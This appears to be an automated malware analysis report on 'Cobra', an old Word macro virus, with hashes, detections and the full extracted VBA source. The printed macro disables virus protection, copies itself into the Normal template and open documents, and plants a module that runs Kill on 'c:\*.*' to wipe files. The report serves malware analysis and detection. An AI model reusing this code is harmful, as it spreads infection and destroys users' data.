Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1c130bb508050e55…

MALICIOUS

Office (OLE)

30.0 KB Created: 1999-02-23 04:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d5fe3ef30275357141324be7983af004 SHA-1: 88a4958ea5f699a9d2a272e66cd2f4a12882b7b3 SHA-256: 1c130bb508050e555eb771afb94a40d7bc08200d5f7b52e861824f8002312dee
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macros, specifically an AutoOpen macro, which is a strong indicator of malicious intent. The script attempts to copy itself to the Normal template and the active document, a common persistence technique. The presence of 'Cobra' in the macro name and the document body, along with ClamAV detections for 'Doc.Trojan.Cobra-7' and 'Win.Trojan.C-286', strongly suggests a known malware family, though specific attribution is not possible from the provided evidence alone. The AutoClose macro also contains logic to display a message box on September 11th, indicating a potential time-based trigger.

Heuristics 5

  • ClamAV: Doc.Trojan.Cobra-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Cobra-7
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2785 bytes
SHA-256: 22626d1d6a5751b54728ea28af538fb2fb075ea974722eb457d5a356618a9f12
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Cobra"
'Cobra Version 1.0B
Sub AutoOpen()
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
MacCopToNor
MacCopToAp
End Sub
Sub MacCopToNor()
For Each ModOk In NormalTemplate.VBProject.VBComponents
If ModOk.Name = "Cobra" Then
Exit Sub
End If
Next
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="Cobra", _
Object:=wdOrganizerObjectProjectItems
End Sub
Sub MacCopToAp()
For Each ModOk In ActiveDocument.VBProject.VBComponents
If ModOk.Name = "Cobra" Then
Exit Sub
End If
Next
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:="Cobra", _
Object:=wdOrganizerObjectProjectItems
End Sub
Sub AutoClose()
If Month(Now) = 9 And Day(Now) = 11 Then
If Documents.Count > 0 Then
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "'Cobra Version 1.0B" Then
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, "'Cobra Version 1.0B"
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 2, "Sub FileExit"
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 3, "MsgBox " + """You are infected with Cobra""" + ",," + """Cobra"""
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 4, "WordBasic.FileExit"
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 5, "End Sub"
End If
End If
End If
End Sub
Sub FileClose()
MacCopToNor
MacCopToAp
WordBasic.FileClose
End Sub
Sub FileSave()
MacCopToNor
MacCopToAp
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
For Each ModOk In ActiveDocument.VBProject.VBComponents
If ModOk.Name = "ComCity" Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, _
Name:="ComCity", Object:=wdOrganizerObjectProjectItems
Exit Sub
End If
Next
Set ModAdd = ActiveDocument.VBProject.VBComponents.Add(1)
ModAdd.Name = "ComCity"
ModAdd.CodeModule.InsertLines 1, "Sub FileNew"
ModAdd.CodeModule.InsertLines 2, "On Error Resume Next"
ModAdd.CodeModule.InsertLines 3, "dialogs(wdDialogFileNew).Show"
ModAdd.CodeModule.InsertLines 4, "If day(now)>11  and month(now)>=10 then"
ModAdd.CodeModule.InsertLines 5, "Kill " + """c:\*.*"""
ModAdd.CodeModule.InsertLines 6, "End if"
ModAdd.CodeModule.InsertLines 7, "End Sub"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.